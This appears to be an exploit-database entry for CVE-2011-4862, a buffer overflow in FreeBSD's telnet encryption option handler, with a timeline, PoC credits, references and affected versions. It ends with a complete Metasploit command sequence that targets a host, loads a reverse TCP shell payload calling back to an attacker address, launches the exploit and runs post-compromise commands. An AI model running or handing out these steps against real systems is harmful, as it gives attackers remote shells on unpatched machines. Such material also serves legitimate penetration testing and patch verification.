Timeline :

Vulnerability exploited in the wild
Public release of the vulnerability the 2011-12-23
Metasploit PoC provided the 2011-12-27

PoC provided by :

Jaime Penalba Estebanez
Brandon Perry
Dan Rosenberg
hdm

Reference(s) :

CVE-2011-4862
OSVDB-78020
FreeBSD-SA-11:08.telnetd

Affected version(s) :

All supported versions of FreeBSD.

Tested on FreeBSD 8.1-RELEASE

Description :

This module exploits a buffer overflow in the encryption option handler of the FreeBSD telnet service.

Commands :

use exploit/freebsd/telnet/telnet_encrypt_keyid
set RHOST 192.168.178.112
SET PAYLOAD bsd/x86/shell/reverse_tcp
set LHOST 192.168.178.100
exploit

id
uname -a